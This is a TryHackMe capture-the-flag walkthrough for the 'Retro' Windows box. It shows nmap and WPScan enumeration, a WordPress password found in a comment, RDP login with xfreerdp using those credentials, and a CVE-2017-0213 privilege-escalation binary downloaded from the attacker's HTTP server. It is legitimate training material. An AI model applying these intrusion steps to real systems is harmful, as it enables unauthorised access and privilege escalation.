Retro - TryHackMe Walkthrough
Retro - “New high score! Can you time travel? If not, you might want to think about the next best thing.” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
We are given the IP 10.10.120.163, add it to /etc/hosts and run a portscan:
nmap -p- -A retro.thm -o portscan
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RETROWEB | NetBIOS_Domain_Name: RETROWEB | NetBIOS_Computer_Name: RETROWEB | DNS_Domain_Name: RetroWeb | DNS_Computer_Name: RetroWeb | Product_Version: 10.0.14393 |_ System_Time: 2020-07-29T15:13:43+00:00 | ssl-cert: Subject: commonName=RetroWeb | Not valid before: 2020-07-28T15:04:04 |_Not valid after: 2021-01-27T15:04:04 |_ssl-date: 2020-07-29T15:13:44+00:00; +1s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Check out port 80
What is the hidden directory which the website lives on?
Let’s run a dirbuster scan. The normal wordlist didn’t get any results so I used directory-list-2.3-medium.txt
We found a directory called Retro.
We have more to enumerate. I saw some Wordpress related directories on our dirbuster scan so let’s visit wp-admin to confirm.
The URL redirects us to
Let’s add localhost to our hosts file:
sudo nano /etc/hosts 10.10.120.163 retro.thm localhost
Revisit the wp-admin page:
Let’s run WPScan:
wpscan --url http://retro.thm/retro -e u
This will scan the website and find possible users.
[i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://retro.thm/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
We’ve found Wade. The first result says it was found by Author posts so I began studying their content.
I saw that there was a comment made by Waze on one of his posts:
Here is the comment:
Leaving myself a note here just in case I forget how to spell it: parzival
Turns out this is the password for his account. Log into his account:
I looked for a bit but this seems to be a dead end. Looked up all the installed plugins, Wordpress version etc but no obviously vulnerabilities.
What else could we do with these credentials? Maybe the other open port for RDP. Let’s try and connect using the following command:
xfreerdp /u:wade /p:parzival /v:retro.thm
We successfully got an RDP session:
The user flag is on the desktop.
I saw the machine has Chrome installed which is not by default so I checked to see if I could find anything on there.
I saw this:
I found this exploit:
Let’s download the .exe file to our local machine and set up an HTTP server so we can transfer it to the Windows machine.
For simplicity, I visited http://10.9.6.63:8080/ on Chrome and installed the binary.
I followed the steps but this didn’t lead me anywhere. Some further inspection of the Windows system:
C:\Users\Wade\Documents>systeminfo Host Name: RETROWEB OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation
I researched a bit about OS 10.0.14393 N/A Build 14393 and also ran Windows Exploit Suggester:
And I found this exploit:
So all we need to do is install CVE-2017-0213_x64.exe and run it on our target system.
Now run the executable (not from terminal) and you will be given a terminal with elevated privileges.
The last flag is in the admins Desktop directory. Thank you for reading.